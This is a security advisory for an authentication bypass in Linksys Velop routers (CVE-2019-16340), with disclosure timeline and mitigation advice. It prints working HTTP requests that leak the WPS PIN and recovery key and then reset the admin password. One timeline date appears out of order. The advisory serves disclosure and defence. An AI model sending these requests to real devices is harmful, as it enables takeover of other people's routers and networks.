Advisories

Linksys Velop Authentication Bypass

CVE ID

CVE-2019-16340

Tested Versions

  • Linksys Velop 1.1.2.185309

Product URL(s)

  • https://www.linksys.com/us/velop/

Velop is a WHOLE HOMEMESH Wi-Fi system from LINKSYS. It allows users to enjoy fast, nonstop Wi-Fi everywhere with Velop’s modular easy-to-use Wi-Fi Mesh system.

There are three categories from their official site: WHW0303, WHW0302, WHW0301.

The differences between these three are the pack count: 1, 2 or 3. The system is the same.

Vulnerability

There are many information leak problems; one of them is through /sysinfo_json.cgi, requesting this URL will leak sensitive information and may lead to authentication bypass.

We can get some helpful information from the PoC below:

GET /sysinfo_json.cgi HTTP/1.1
Host: 10.158.1.1
Accept: application/json; charset=UTF-8
Expires: Fri, 10 Oct 2015 14:19:41 GMT
Accept-Encoding: gzip, deflate
Accept-Language: zh-Hans-CN;q=1, en-CN;q=0.9
Cache-Control: no-cache
Content-Type: application/json; charset=UTF-8
User-Agent: Linksys/2.5.2 (iPhone; iOS 11.2.6; Scale/3.00)
Connection: close

Response:

HTTP/1.1 200 OK
Connection: close
CONTENT-LANGUAGE: en
Date: Thu, 11 Oct 2012 11:09:15 GMT
Server: lighttpd/1.4.39
Content-Length: 94710

siSections="MfgData,BootData,Syscfg,Sysevent,Messages,Dmesg,Ps,MemoryInfo,CpuInfo,WifiBasicInfo,WifiRadioInfo,WifiClientInfo,WifiPoorClientInfo,WifiLegacyClientInfo,WifiAllAPInfo,WifiSameAPInfo,WifiAllCAInfo,WifiMyCAInfo,IPInfo,PingInfo,Conntrack,ConntrackTotals,ConntrackAvg,Thrulay";
var MfgData = {
 "title": "Manufacturer Data",
 "description": "This is used to manufacturer unit and in SKU API",
 "timestamp": "16:01:02.12/31/69",
 "data": [
{
.......
 "wps_pin": "wps_device_pin = 58163597",
.......
"device_recovery_key": "84667",
.......
 }
 ]
};
......

The most important value we can get is WPS PIN and Device Recovery Key. For the WPS PIN, we can use it to connect to the Wi-Fi even if the Wi-Fi password is changed when WPS is enabled. A recovery key can be used to reset the admin password. We may construct the following request to change the admin password:

POST /JNAP/ HTTP/1.1
Host: 192.168.1.1
Accept: application/json; charset=UTF-8
Expires: Fri, 10 Oct 2015 14:19:41 GMT
Accept-Encoding: gzip, deflate
Accept-Language: zh-Hans-CN;q=1, en-CN;q=0.9
Cache-Control: no-cache
Content-Type: application/json; charset=UTF-8
Content-Length: 48
User-Agent: Linksys/2.5.2 (iPhone; iOS 11.2.6; Scale/3.00)
Connection: close
X-JNAP-Action: http://linksys.com/jnap/nodes/setup/SetAdminPassword

{"resetCode":"84667","adminPassword":"test1234"}

By sending this request to the router, we can successfully change the administration password to test1234.

The crucial part of this vulnerability is that we can request resources by JNAP protocol, but we can also craft an HTTP request. The server doesn’t restrict proper resource, which leads to a sensitive information leak.

A proper request should with X-JNAP-Authorization header like below:

POST /JNAP/ HTTP/1.1
Host: 10.158.1.1
Accept: application/json; charset=UTF-8
Expires: Fri, 10 Oct 2015 14:19:41 GMT
X-JNAP-Authorization: Basic YWRtaW46YWRtaW4=
Accept-Encoding: gzip, deflate
Accept-Language: zh-Hans-CN;q=1, en-CN;q=0.9
Cache-Control: no-cache
Content-Type: application/json; charset=UTF-8
Content-Length: 178
User-Agent: Linksys/2.5.2 (iPhone; iOS 11.2.6; Scale/3.00)
Connection: close
X-JNAP-Action: http://linksys.com/jnap/core/Transaction

[{"request":{"sinceRevision":0},"action":"http:\/\/linksys.com\/jnap\/devicelist\/GetDevices3"},{"request":{},"action":"http:\/\/linksys.com\/jnap\/router\/GetDHCPClientLeases"}]

We highly recommend that end users to disallow request to /sysinfo_json.cgi, or check whether there is a correct authorization header in HTTP request.

Timeline

  • 2019-06-22 Vendor disclosure
  • 2019-02-26 Vendor acknowledged the problem and reproduced it
  • 2019-05-31 We asked vendor if there are any updates. No response
  • 2019-06-06 We asked vendor if there are any updates
  • 2019-06-06 Vendor replied "Apologies for the delay in response; the engineering team informs me that a firmware release for Velop will be released later this month. Would you like a preview of this firmware to confirm our fix?"
  • 2019-06-06 We replied No
  • 2019-07-26 Vendor replied "We are starting a limited rollout of the release starting tonight and if all goes well, the full release will be opened up in the first week of August. Thank you!"
  • 2019-08-21 We asked vendor if there are any updates
  • 2019-08-23 Vendor replied as "We have finally released a fix to address this issue. https://www.linksys.com/us/support-article?articleNum=207568. We have not applied for a CVE and do not have any plans to do so. Thank you!"
  • 2019-08-26 We asked if we could apply a CVE for this issue
  • 2019-08-27 Vendor replied:we have no objections if you'd like to file for a CVE.

Credit

Discovered by Puzzorsj